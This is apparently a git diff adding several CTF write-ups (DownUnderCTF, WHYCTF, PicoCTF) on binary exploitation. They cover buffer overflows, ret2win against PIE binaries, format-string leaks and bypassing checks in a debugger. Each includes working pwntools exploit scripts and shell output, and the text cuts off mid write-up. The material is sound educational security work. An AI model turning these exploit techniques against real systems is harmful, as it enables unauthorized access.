+email_server: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f8b6376e8e206a299f035e9a5a587abd7ae50b24, for GNU/Linux 3.2.0, not stripped
+$ checksec --file=email_server
+RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
+Full RELRO      No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   50 Symbols        No    0               3               email_server
+```
+
+Another good thing for information gathering here is that we have access to the complete C source code; we do not need to disassemble or decompile anything. Let's take a look (as always, unimportant parts are stripped):
+
+```c
+void open_admin_session() {
+    printf("-> Admin login successful. Opening shell...\n");
+    system("/bin/sh");
+    exit(0);
+}
+
+void print_email() {
+    // A bunch of printf, redacted here. who cares
+    exit(0);
+}
+
+const char* logins[][2] = {
+    {"admin", "🇦🇩🇲🇮🇳"},
+    {"guest", "guest"},
+};
+
+int main() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+
+    char password[32];
+    char username[32];
+
+    printf("┌──────────────────────────────────────┐\n");
+    printf("│      Secure Email System v1.337      │\n");
+    printf("└──────────────────────────────────────┘\n\n");
+
+    printf("Enter your username: ");
+    fgets(username, sizeof(username), stdin);
+    username[strcspn(username, "\n")] = 0;
+
+    if (strcmp(username, "admin") == 0) {
+        printf("-> Admin login is disabled. Access denied.\n");
+        exit(0);
+    }
+
+    printf("Enter your password: ");
+    gets(password);
+
+    for (int i = 0; i < sizeof(logins) / sizeof(logins[0]); i++) {
+        if (strcmp(username, logins[i][0]) == 0) {
+            if (strcmp(password, logins[i][1]) == 0) {
+                printf("-> Password correct. Access granted.\n");
+                if (strcmp(username, "admin") == 0) {
+                    open_admin_session();
+                } else {
+                    print_email();
+                }
+            } else {
+                printf("-> Incorrect password for user '%s'. Access denied.\n", username);
+                exit(1);
+            }
+        }
+    }
+    printf("-> Login failed. User '%s' not recognized.\n", username);
+    exit(1);
+}
+```
+
+Okay, so apparently we have to trigger the `open_admin_session()` function someway. Problem is, we need to login as admin for this, and the admin login seems to be disabled.
+
+However, even though the programmer thought about using `fgets()` to get secure user input for the username field, we see that the very very unsafe `gets()` function is used here for the password input. This is prone to buffer overflow as we all know.
+
+What I wanted to first was to exploit a traditional ret2win vulnerability and get the challenge done fast, but things didn't turn as I had expected. Opening the file in pwndbg, I generated a long enough cyclic pattern (two buffers of 32 bytes so the default 100 bytes length should be good).
+
+When injecting though, no SEGFAULT happened. Weird...
+
+```
+pwndbg> cyclic
+aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
+pwndbg> r
+Starting program: /home/qelal/downunderctf/corporate-cliche/email_server 
+┌──────────────────────────────────────┐
+│      Secure Email System v1.337      │
+└──────────────────────────────────────┘
+
+Enter your username: whatever
+Enter your password: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
+-> Login failed. User 'iaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa' not recognized.
+[Inferior 1 (process 7635) exited with code 01]
+```
+
+No SEGFAULT, but it seems that after some padding, we still overflow into the username field (from the password buffer). Interesting...
+
+Just to be sure, we'll calculate the offset. I don't want to count by hand, so:
+
+```
+pwndbg> cyclic -n 4 -l iaaa
+Finding cyclic pattern of 4 bytes: b'iaaa' (hex: 0x69616161)
+Found at offset 32
+```
+
+As expected, it's 32 bytes long. Wait, so if we can overflow the username, we could probably bypass the check for admin login! Also, we are given a "logins" array that contain usernames and passwords, especially the admin one.
+
+However the admin password isn't easily readable; it does not render in the terminal so it is probably some combination of Unicode codepoints, representing stuff like emojis. We can get the raw bytes of it by inspecting the executable in an hex editor:
+
+```
+00002440   00 61 64 6D  69 6E 00 F0  9F 87 A6 F0  9F 87 A9 F0  9F 87 B2 F0  9F 87 AE F0  9F 87 B3 00  67 75 65 73  .admin......................gues
+00002460   74 00 00 00  00 00 00 00  E2 94 8C E2  94 80 E2 94  80 E2 94 80  E2 94 80 E2  94 80 E2 94  80 E2 94 80  t...............................
+```
+
+We see, after the "admin" null-terminated array of bytes, some patterns always starting by `F0 9F 87` and finally ending by a null-byte. This pattern is the [UTF-8 encoding for emojis in Unicode](https://apps.timwhitlock.info/emoji/tables/unicode). That's a bingo! We then extract this byte array and this is what we have as the admin password:
+
+```
+\xF0\x9F\x87\xA6\xF0\x9F\x87\xA9\xF0\x9F\x87\xB2\xF0\x9F\x87\xAE\xF0\x9F\x87\xB3
+```
+
+## Exploitation
+
+What we can do now, to exploit our executable, is:
+- filling the username field with garbage
+- filling the password field with the admin password, null-terminate it, add some padding, and then inject the "admin" string after the buffer so it overflows into the username field.
+
+This way, we could probably bypass the login check and enter the system. I'm going to show the full exploit code, including boilerplate (thanks to [CryptoCat](https://www.youtube.com/@_CryptoCat) for this beautiful piece of code by the way), but I won't do it again in other write-ups; here will be the reference for it.
+
+The boilerplate allows us to switch easily from local/remote execution, and it also allows pwntools to automatically figure out byte order, word size, and such things we don't want to carry around everywhere.
+
+Here it is:
+
+```python
+from pwn import *
+
+# Boilerplate code
+
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    else:  # Run locally
+        return process([exe] + argv, *a, **kw)
+
+gdbscript = '''
+init-pwndbg
+continue
+'''.format(**locals())
+
+exe = './email_server'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+context.log_level = 'debug'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+io = start()
+
+# Auth as whatever user
+io.sendlineafter(b':', "guest")
+
+# Send admin password recovered from hexdump + admin (overflowing into username[32])
+io.sendlineafter(b':', b'\xF0\x9F\x87\xA6\xF0\x9F\x87\xA9\xF0\x9F\x87\xB2\xF0\x9F\x87\xAE\xF0\x9F\x87\xB3\x00' + 11*b'A' + b'admin') 
+
+# Receive the flag
+io.interactive()
+```
+
+Now, we can run the exploit and get a shell, and then our precious flag:
+
+```
+(MyEnv) ➜  corporate-cliche python exploit.py REMOTE chal.2025.ductf.net 30000
+[+] Opening connection to chal.2025.ductf.net on port 30000: Done
+[DEBUG] Received 0x135 bytes:
+    00000120  45 6e 74 65  72 20 79 6f  75 72 20 75  73 65 72 6e  │Ente│r yo│ur u│sern│
+    00000130  61 6d 65 3a  20                                     │ame:│ │
+    00000135
+[DEBUG] Sent 0x6 bytes:
+    b'guest\n'
+[DEBUG] Received 0x15 bytes:
+    b'Enter your password: '
+[DEBUG] Sent 0x26 bytes:
+    00000000  f0 9f 87 a6  f0 9f 87 a9  f0 9f 87 b2  f0 9f 87 ae  │····│····│····│····│
+    00000010  f0 9f 87 b3  00 41 41 41  41 41 41 41  41 41 41 41  │····│·AAA│AAAA│AAAA│
+    00000020  61 64 6d 69  6e 0a                                  │admi│n·│
+    00000026
+[*] Switching to interactive mode
+ [DEBUG] Received 0x51 bytes:
+    b'-> Password correct. Access granted.\n'
+    b'-> Admin login successful. Opening shell...\n'
+-> Password correct. Access granted.
+-> Admin login successful. Opening shell...
+$ ls
+[DEBUG] Received 0x16 bytes:
+    b'flag.txt\n'
+    b'get-flag\n'
+    b'pwn\n'
+$ cat flag.txt
+[DEBUG] Received 0x41 bytes:
+    b'DUCTF{wow_you_really_boiled_the_ocean_the_shareholders_thankyou}\n'
+```
+
+Nice! I really liked this one because the exploit wasn't what I expected at first. Really cool.
diff --git a/writeups/2025-07-20-Zeus.md b/writeups/2025-07-20-Zeus.md
new file mode 100644
index 0000000..7b88d56
--- /dev/null
+++ b/writeups/2025-07-20-Zeus.md
@@ -0,0 +1,137 @@
+---
+title: "DownUnderCTF 2025: Zeus"
+excerpt: "Reverse-engineering Zeus!"
+tags: [ctf, rev] 
+---
+
+## Recon
+
+The challenge gives us an executable file. As we usually do in reverse engineering challenges, we start by doing some recon on the file type, target architecture, and security:
+
+```
+$ file zeus
+zeus: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=95542c1d888f30465172c1c77dd1eef1109b4c29, for GNU/Linux 3.2.0, not stripped
+$ checksec --file=zeus
+RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
+Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   39 Symbols        No    0               1               zeus
+```
+
+We can decompile it with Ghidra to extract some C code; after renaming some variables (and stripping some content for clarity) we get this:
+
+```c
+undefined8 main(int argc,long argv)
+{
+  int result;
+  undefined8 local_98;
+  undefined8 local_90;
+  // [REDACTED FOR SIMPLICITY]
+  char *local_18;
+  char *str1;
+  
+  str1 = 
+  "To Zeus Maimaktes, Zeus who comes when the north wind blows, we offer our praise, we make you wel come!"
+  ;
+  local_18 = "Maimaktes1337";
+  local_58 = 0xc1f1027392a3409;
+  // [REDACTED FOR SIMPLICITY]
+  local_30 = 0x3a110315320f0e;
+  uStack_29 = 0x4e4a5a00;
+  if (((argc == 3) && (result = strcmp(*(char **)(argv + 8),"-invocation"), result == 0)) &&
+     (result = strcmp(*(char **)(argv + 0x10),str1), result == 0)) {
+    puts("Zeus responds to your invocation!");
+    local_98 = local_58;
+    local_90 = local_50;
+    local_88 = local_48;
+    local_80 = local_40;
+    local_78 = local_38;
+    local_70 = local_30;
+    uStack_69 = uStack_29;
+    xor(&local_98,local_18);
+    printf("His reply: %s\n",&local_98);
+    return 0;
+  }
+  puts("The northern winds are silent...");
+  return 0;
+}
+```
+
+What we can understand from this snippet is that the program is waiting for 3 arguments; the program name, an option `-invocation` and some invocative gibberish for Zeus. After this, the program apparently does some calculations (notably XOR) with pre-defined values and gives us a reply that could be the flag we're looking for.
+
+What we could do is simply provide the arguments to the executable, but it is funnier to do it the other way; as we have the executable, as the flag is embedded in it some way, and as we have complete control over it, we can simply use a debugger to pass each check and get the right answer.
+
+As the executable is targeting 64-bit x86 for GNU/Linux based systems, we can derive from this the calling convention used. In this case, it is the [System V ABI](https://wiki.osdev.org/System_V_ABI) (Application Binary Interface). There, parameters to the functions are passed into the `rdi`, `rsi`, `rdx`, `r10`, `r8`, and `r9` registers, in this order. The result of the operation is then stored in the `rax` register.
+
+Here, we'll be looking at the result of the `strcmp` calls that should be zero; so what we'll do is, after each call to strcmp, just set `rax` to zero and step up to the next instruction.
+
+By disassembling the binary and focusing on the string comparison part, we get:
+
+```nasm
+   0x0000000000001265 <+157>:   add    rax,0x8
+   0x0000000000001269 <+161>:   mov    rax,QWORD PTR [rax]
+   0x000000000000126c <+164>:   lea    rdx,[rip+0xe0a]        # 0x207d
+   0x0000000000001273 <+171>:   mov    rsi,rdx
+   0x0000000000001276 <+174>:   mov    rdi,rax
+   0x0000000000001279 <+177>:   call   0x1050 <strcmp@plt>
+   0x000000000000127e <+182>:   test   eax,eax
+   0x0000000000001280 <+184>:   jne    0x132c <main+356>
+```
+
+Here, as specified in the calling convention, arguments are passed into `rdi` and `rsi`, then the function is called, and then the program tests if `eax` (the codeword for the lower 32-bits of `rax`) is zero.
+
+## Exploitation
+
+We set a breakpoint at `*main+177`, and another one at `*main+214` (the second `strcmp` call) and run the program, providing whatever garbage as arguments (as long as `argc == 3`):
+
+```nasm
+$ gdb --args ./zeus hello world
+(gdb) b *main+177
+Breakpoint 1 at 0x1279
+(gdb) b *main+214
+Breakpoint 2 at 0x129e
+(gdb) r
+Breakpoint 1, 0x0000555555555279 in main ()
+(gdb) x/3i $rip
+=> 0x555555555279 <main+177>:   call   0x555555555050 <strcmp@plt>
+   0x55555555527e <main+182>:   test   eax,eax
+   0x555555555280 <main+184>:   jne    0x55555555532c <main+356>
+```
+
+Okay, we're at the interesting part. Let's step to the test instruction, and at this point, set the register to zero. Then, we'll step again and pass over the jump, continuing the execution normally until the next check.
+
+```nasm
+(gdb) si
+0x0000555555555050 in strcmp@plt ()
+(gdb) finish
+Run till exit from #0  0x0000555555555050 in strcmp@plt ()
+0x000055555555527e in main ()
+(gdb) x/i $rip
+=> 0x55555555527e <main+182>:   test   eax,eax
+(gdb) set $rax = 0
+(gdb) ni
+0x0000555555555280 in main ()
+(gdb) x/i $rip
+=> 0x555555555280 <main+184>:   jne    0x55555555532c <main+356>
+(gdb) ni
+0x0000555555555286 in main ()
+(gdb) x/i $rip
+=> 0x555555555286 <main+190>:   mov    rax,QWORD PTR [rbp-0xa0]
+```
+
+As you can see here, we effectively bypassed the check for the first argument. We will then do the same for the last argument; stepping until `strcmp`, setting `rax` to zero before the test instruction, then step, you know the drill:
+
+```nasm
+(gdb) c
+Continuing.
+
+Breakpoint 2, 0x000055555555529e in main ()
+(gdb) ni
+0x00005555555552a3 in main ()
+(gdb) set $rax = 0
+(gdb) c
+Continuing.
+Zeus responds to your invocation!
+His reply: DUCTF{king_of_the_olympian_gods_and_god_of_the_sky}
+[Inferior 1 (process 7271) exited normally]
+```
+
+We bypassed the checks; the flag is now ours!
diff --git a/writeups/2025-08-11-old-memes.md b/writeups/2025-08-11-old-memes.md
new file mode 100644
index 0000000..f1ceea1
--- /dev/null
+++ b/writeups/2025-08-11-old-memes.md
@@ -0,0 +1,138 @@
+---
+title: "WHYCTF 2025: old-memes"
+excerpt: "Classic 32-bit x86 ELF ret2win exploit (stack buffer overflow) with Position Independent Executable"
+tags: [ctf, pwn] 
+---
+
+As usual, we'll begin by analyzing the executable features and architecture:
+
+```
+$ file old-memes
+old-memes: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=c315155fad7db7cae0003de733ec91e47c0dba89, for GNU/Linux 3.2.0, not stripped
+```
+
+We're dealing with a 32-bit executable this time. I've gotten more used to 64-bit recently, but this should be no problem. We can also take a look at the enabled security features:
+
+```
+pwndbg> checksec
+File:     /home/qelal/WHY2025ctf/OldMemesNeverDie/old-memes
+Arch:     i386
+RELRO:      Partial RELRO
+Stack:      No canary found
+NX:         NX enabled
+PIE:        PIE enabled
+Stripped:   No
+```
+
+It is the first time that I will deal with a PIE-enabled file. To make things clear, PIE stands for "Position Independant Executable"; which basically means, the system will load the program at a different address every time it is run (using ASLR: Address Space Layout Randomization). This is a problem for us because it will be harder to get the addresses of the symbols we will work with.
+
+Let's run the program to see its behavior:
+
+```
+$ ./old-memes
+(do with this information what you want, but the print_flag function can be found here: 0x565ff1ed)
+What is your name?
+> ^C
+$ ./old-memes
+(do with this information what you want, but the print_flag function can be found here: 0x565e01ed)
+What is your name?
+```
+
+The programmer was really kind and gave us the address of a `print_flag` function at startup. We can clearly see here that the address changes for each execution. Let's take a look into the source code now:
+
+```c
+int print_flag(){
+    // does what it's supposed to do, redacted here
+}
+
+int ask_what(){
+    char what[8];
+    char check[6] = "what?";
+
+    printf("\n\nWhat is your name?\n> ");
+    fgets(what, sizeof(what), stdin);
+    what[strcspn(what, "\r\n")] = 0;
+    if (strcmp(check, what) != 0)
+        return 1;
+    return 0;
+}
+
+int ask_name(){
+    char name[30];
+    printf("\n\nWhat is your name?\n> ");
+    fgets(name, 0x30, stdin);
+    name[strcspn(name, "\r\n")] = 0;
+    printf("F* YOU %s!\n", name);
+}
+
+int main(){
+    setbuf(stdout, 0);
+    printf("(do with this information what you want, but the print_flag function can be found here: %p)\n", print_flag);
+
+    if(ask_what())
+        return 1;
+    ask_name();
+    return 0;
+}
+```
+
+At first glance we can see that the first function we enter after main is `ask_what`; a string comparison is done and if we enter `what?` we get into another function, called `ask_name`. This function hosts a buffer overflow: indeed, the programmer allocated 30 bytes for the `name` string, but gave `0x30` to the `fgets` function, the safe replacement for the very unsafe `gets` we know from past challenges.
+
+It is obvious that 30 in decimal and its hexadecimal representation are not the same number; the latter being 48 decimal. This allows for 18 bytes of overflow.
+
+To confirm this hypothesis we can try to enter a big enough amount of bytes when we enter the insecure prompt:
+
+```
+$ ./old-memes 
+(do with this information what you want, but the print_flag function can be found here: 0x5657c1ed)
+What is your name?
+> what?
+What is your name?
+> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+F* YOU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
+[1]    12233 segmentation fault (core dumped)  ./old-memes
+```
+
+A segfault occurs, which means the program tried to access an invalid address, because, of course, `0x41414141 (AAAA)` isn't mapped.
+
+We can trigger a controlled segfault in pwndbg to find the exact EIP (extended instruction pointer) offset, which normally holds the return address to the function we were called from; in this case, `main`, but we'll modify it to reach the `print_flag` function.
+
+After generating a cyclic pattern, injecting it, and observing the EIP value `0x616c6161 ('aala')` we find the offset:
+
+```
+pwndbg> cyclic -l aala
+Finding cyclic pattern of 4 bytes: b'aala' (hex: 0x61616c61)
+Found at offset 42
+```
+
+We can demonstrate that this offset is correct by injecting arbitrary controlled data, like four 'B' characters:
+
+```bash
+$ python3 -c "print('A'*42+'B'*4)"
+```
+And indeed, pwndbg shows us `EIP  0x42424242 ('BBBB')`. We are good to go.
+
+What I bascially did from there was scraping the address given in text by the program, converting it to little-endian (because the architecture here is x86) and building a small pwntools script. Here's the exploit code (stripped from boilerplate):
+
+```python
+offset = 42
+
+io = start()
+
+info_line = io.recvline()
+print_flag_addr = bytes.fromhex(info_line[-10:-2].decode())[::-1]
+print(print_flag_addr)
+
+io.sendlineafter(b'> ', "what?")
+io.sendlineafter(b'> ', b'A'*offset+print_flag_addr)
+
+io.interactive()
+```
+
+And it worked first try!
+
+```
+$ python exploit.py REMOTE old-memes-never-die.ctf.zone 4242
+F* YOU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xfd1}[!
+F* YOU and your flag: flag{f648a34020ffba10cc5cfc9bd2240725}
+```
diff --git a/writeups/2025-08-18-pie-time.md b/writeups/2025-08-18-pie-time.md
new file mode 100644
index 0000000..5c8905d
--- /dev/null
+++ b/writeups/2025-08-18-pie-time.md
@@ -0,0 +1,86 @@
+---
+title: "PicoCTF 2025: PIE TIME"
+excerpt: "Hinted PIE ret2win stack buffer overflow on an amd64 ELF"
+tags: [ctf, pwn]
+---
+
+## Recon
+
+```
+$ file vuln
+vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0072413e1b5a0613219f45518ded05fc685b680a, for GNU/Linux 3.2.0, not stripped
+$ checksec --file=vuln
+[*] '/home/qelal/PicoCTF/PIE-TIME/vuln'
+    Arch:       amd64-64-little
+    RELRO:      Full RELRO
+    Stack:      Canary found
+    NX:         NX enabled
+    PIE:        PIE enabled
+    SHSTK:      Enabled
+    IBT:        Enabled
+    Stripped:   No
+```
+
+PIE is enabled here, so the program will be loaded at a different memory address each time it is run. Also, addresses of instructions inside the binary are now offsets, not absolute addresses. Fortunately, the program leaks the address for symbol `main` at runtime:
+
+```
+$ ./vuln
+Address of main: 0x55aadb5fd33d
+Enter the address to jump to, ex => 0x12345: ff
+Your input: ff
+Segfault Occurred, incorrect address.
+```
+
+The program behavior is quite simple, it asks for an address and jumps to it. Source code for the challenge was available, but it is easy to work without it here.
+
+Upon inspection in IDA, we see a `win` function that seems to open the flag file:
+
+```nasm
+.text:00000000000012A7                 endbr64
+.text:00000000000012AB                 push    rbp
+.text:00000000000012AC                 mov     rbp, rsp
+.text:00000000000012AF                 sub     rsp, 10h
+.text:00000000000012B3                 lea     rdi, aYouWon    ; "You won!"
+.text:00000000000012BA                 call    _puts
+.text:00000000000012BF                 lea     rsi, modes      ; "r"
+.text:00000000000012C6                 lea     rdi, filename   ; "flag.txt"
+.text:00000000000012CD                 call    _fopen
+.text:00000000000012D2                 mov     [rbp+stream], rax
+.text:00000000000012D6                 cmp     [rbp+stream], 0
+.text:00000000000012DB                 jnz     short loc_12F3
+.text:00000000000012DD                 lea     rdi, aCannotOpenFile ; "Cannot open file."
+.text:00000000000012E4                 call    _puts
+.text:00000000000012E9                 mov     edi, 0          ; status
+.text:00000000000012EE                 call    _exit
+```
+
+We can note here the offset of the function which is `0x12A7`. Also, by taking a look at the `main` symbol, we see its offset is `0x133D`:
+
+```c
+.text:000000000000133D ; int __fastcall main(int argc, const char **argv, const char **envp)
+.text:000000000000133D                 public main
+```
+
+## Exploit
+
+Having this information we can deduct the space between the two symbols, by subtracting the two offsets. We find `0x96` bytes.
+
+Now we can deduct the position of the `win` function at runtime, by taking `main`'s address and subtracting `0x96`. This can be done in a Pwntools script:
+
+```python
+io = start()
+
+main_text = io.recvuntil(b'12345:').split(b'\n')[0].split(b': ')[1].decode()
+main_addr = int(main_text, 16)
+win_addr = main_addr - 0x96
+
+io.sendline(hex(win_addr).encode())
+print(io.recvall())
+```
+
+We can execute the exploit and get the flag:
+
+```
+$ python exploit.py REMOTE rescued-float.picoctf.net 52840
+b' Your input: 59c1cff1d2a7\nYou won!\npicoCTF{REDACTED}\n\n'
+```
diff --git a/writeups/2025-08-19-pie-time-2.md b/writeups/2025-08-19-pie-time-2.md
new file mode 100644
index 0000000..58bffba
--- /dev/null
+++ b/writeups/2025-08-19-pie-time-2.md
@@ -0,0 +1,168 @@
+---
+title: "PicoCTF 2025: PIE TIME 2"
+excerpt: "Using format string vulnerability to leak stack information and hijack control flow on amd64 PIE executable"
+tags: [ctf, pwn] 
+---
+
+## Recon
+
+This challenge is the follow-up of the previous "PIE TIME" level.
+
+```
+$ PIE-TIME2 file vuln
+vuln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=89c0ed5ed3766d1b85809c2bef48b6f5f0ef9364, for GNU/Linux 3.2.0, not stripped
+$ PIE-TIME2 checksec --file=vuln
+[*] '/home/qelal/PicoCTF/PIE-TIME2/vuln'
+    Arch:       amd64-64-little
+    RELRO:      Full RELRO
+    Stack:      Canary found
+    NX:         NX enabled
+    PIE:        PIE enabled
+    SHSTK:      Enabled
+    IBT:        Enabled
+    Stripped:   No
+```
+
+All protections are enabled, notably PIE (Position Independent Executable). The program will be loaded each time at different addresses, and the binary will only contain offsets (relative addresses), not absolute addresses like when we compile with `-no-pie`. Anyways, here is the program's behavior:
+
+```
+$ ./vuln 
+Enter your name:john
+john
+ enter the address to jump to, ex => 0x12345: ff
+Segfault Occurred, incorrect address.
+```
+
+The behavior is mostly the same as the previous level, however here they ask us for our name first, making the program quite polite.
+
+The developer wasn't so kind this time and didn't give us a leak of any address. But we can probably find this by ourselves, can't we?
+
+Looking at the source code we find some interesting stuff:
+
+```c
+void call_functions() {
+  char buffer[64];
+  printf("Enter your name:");
+  fgets(buffer, 64, stdin);
+  printf(buffer);
+
+  unsigned long val;
+  printf(" enter the address to jump to, ex => 0x12345: ");
+  scanf("%lx", &val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}
+
+int win() {
+    // reads the flag
+}
+
+int main() {
+  call_functions();
+  return 0;
+}
+```
+
+For once, they used `fgets`, the safe replacement for `gets`, which checks for input length, making us unable to trigger a buffer overflow here. However, the `printf` function was directly called on user input: `printf(buffer)`.
+
+This is a terrible idea as the content of the buffer will be used to parse the format string for printf; for example we could try injecting a `%p` in the input, and we would get the next pointer on the stack. As the input buffer is limited to 64 chars, we can chain a couple more, and leak many pointers on the stack..
+
+This is the vulnerability we could use to leak main's return address. To do this first we'll need to know where this address is located on the stack.
+
+By decompiling the `main` function, we can find where `call_functions` is supposed to return:
+
+```nasm
+   0x0000000000001437 <+55>:    mov    eax,0x0
+   0x000000000000143c <+60>:    call   0x12c7 <call_functions>
+   0x0000000000001441 <+65>:    mov    eax,0x0
+   0x0000000000001446 <+70>:    pop    rbp
+   0x0000000000001447 <+71>:    ret
+```
+
+The instruction right after the call is at `<main+65>` or offset `0x1441`. We'll take note of this.
+
+We can do a bit of dynamic analysis with pwndbg to know where the return address to main could be on the stack:
+
+```
+pwndbg> b *call_functions
+Breakpoint 1 at 0x12c7
+pwndbg> r
+[...]
+─────[ BACKTRACE ]─────
+► 0   0x5555555552c7 call_functions
+   1   0x555555555441 main+65
+   2   0x7ffff7ded24a None
+   3   0x7ffff7ded305 __libc_start_main+133
+   4   0x5555555551ee _start+46
+```
+
+We can now inject a bunch of `%p` specifiers to leak addresses off the stack and see where we'll find main+65:
+
+```
+Enter your name:%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
+0x5555555592a1 0xfbad2288 0xaaaa6d5f 0x5555555592dc 0x21001 (nil) 0x7ffff7f99760 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x7f000a702520 (nil) 0x7ae1306570e7af00 0x7fffffffdb20 0x555555555441 0x1
+```
+
+We see that `0x555555555441`, our return address to main, is located at position 19 here. Therefore our exploit will use the `%19$p` format specifier to leak only this information. Also, it is the address for the instruction at `<main+65>`. Knowing this we can calculate the address for `main`.
+
+We will simply subtract 65 decimal to the return address we found, and we get: `0x555555555400`. Of course this address will change at each execution but we don't care because we'll automate this later.
+
+Also bear in mind that gdb disables ASLR by default so this perfect address made up of fives will be slightly different in non-debugging conditions.
+
+Now that we leaked main, how do we know where `win()` is? Well, it's really simple. We will do a bit of static analysis (with IDA) to find win's offset:
+
+```
+.text:000000000000136A                 endbr64
+.text:000000000000136E                 push    rbp
+.text:000000000000136F                 mov     rbp, rsp
+.text:0000000000001372                 sub     rsp, 10h
+.text:0000000000001376                 lea     rdi, aYouWon    ; "You won!"
+```
+
+So the offset for `win()` is `0x136A`. Knowing main's offset aswell, we will substract those two. 
+
+```
+difference = main_offset - win_offset
+difference = 0x1400 - 0x136A
+difference = 0x96 bytes
+```
+
+So we know that `win()` is at `main() - 0x96` and we know the address for `main()`. 
+
+To know `win()` we will do: `main() - 0x96 = 0x????` and the address doesn't matter here, it will change everytime. But the idea works.
+
+## Exploit
+
+Great, we have the address for `win()` and the position of main's return address on the stack (19).
+
+We can now write a Pwntools script to exploit the binary and get the flag:
+
+```python
+io = start()
+
+main_offset = 0x1400
+win_offset = 0x136A
+
+diff_bytes = main_offset - win_offset # 0x96
+
+io.sendlineafter(b'name:', b'%19$p')
+main_ret_text = io.recvline()
+
+main_ret_addr = int(main_ret_text.strip(b'\n').decode(), 16) # main+65 
+
+main_addr = main_ret_addr - 65
+win_addr = main_addr - diff_bytes
+
+io.sendlineafter(b'12345:', str(hex(win_addr)).encode())
+result = io.recvall()
+
+print(result)
+```
+
+Let it run!
+
+```
+$ python exploit.py REMOTE rescued-float.picoctf.net 65162
+b" You won!\npicoCTF{REDACTED}\n\n"
+```
diff --git a/writeups/2025-08-24-fmt1.md b/writeups/2025-08-24-fmt1.md
new file mode 100644
index 0000000..946e4bd
--- /dev/null
+++ b/writeups/2025-08-24-fmt1.md
@@ -0,0 +1,99 @@
+---
+title: "PicoCTF 2024: format-string-1"
+excerpt: "Using format string vulnerability to read flag off the stack"
+tags: [ctf, pwn]
+---
+
+## Recon
+
+We're given an executable and its source code; let's first review the code:
+
+```c
+#include <stdio.h>
+
+int main() {
+  char buf[1024];
+  char secret1[64];
+  char flag[64];
+  char secret2[64];
+
+  // Read in first secret menu item
+  FILE *fd = fopen("secret-menu-item-1.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret1, 64, fd);
+  // Read in the flag
+  fd = fopen("flag.txt", "r");
+  if (fd == NULL){
+    printf("'flag.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(flag, 64, fd);
+  // Read in second secret menu item
+  fd = fopen("secret-menu-item-2.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret2, 64, fd);
+
+  printf("Give me your order and I'll read it back to you:\n");
+  fflush(stdout);
+  scanf("%1024s", buf);
+  printf("Here's your order: ");
+  printf(buf);
+  printf("\n");
+  fflush(stdout);
+
+  printf("Bye!\n");
+  fflush(stdout);
+
+  return 0;
+}
+```
+
+The program reads three files, if they're not in the current working directory, the program stops.
+There is an obvious format string vulnerability in the call to `printf(buf)`. The flag is read from a file into a buffer on the stack.
+We will read the flag from the stack as hex and then do some data manipulation on it to get the human-readable format.
+
+## Local testing
+
+Let's find the offset for the `flag` buffer on the stack. First, we create a `flag.txt` in the same directory as the executable, and fill it with an unique, easy to read value, such as "BBBBBBBB" which will look like 0x4242424242424242 in hex. When we'll find that pointer on the stack we know we're at the beginning of the flag buffer, then we will only have to look at the next 8-byte contents on stack to find the other parts of the flag, as the buffer is a continuous memory region.
+
+By the way we'll also create the other 2 needed files, but their content's don't matter here. I'll write AAAAAAAA and CCCCCCCC in them.
+
+```
+$ ./format-string-1
+Give me your order and I'll read it back to you:
+%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
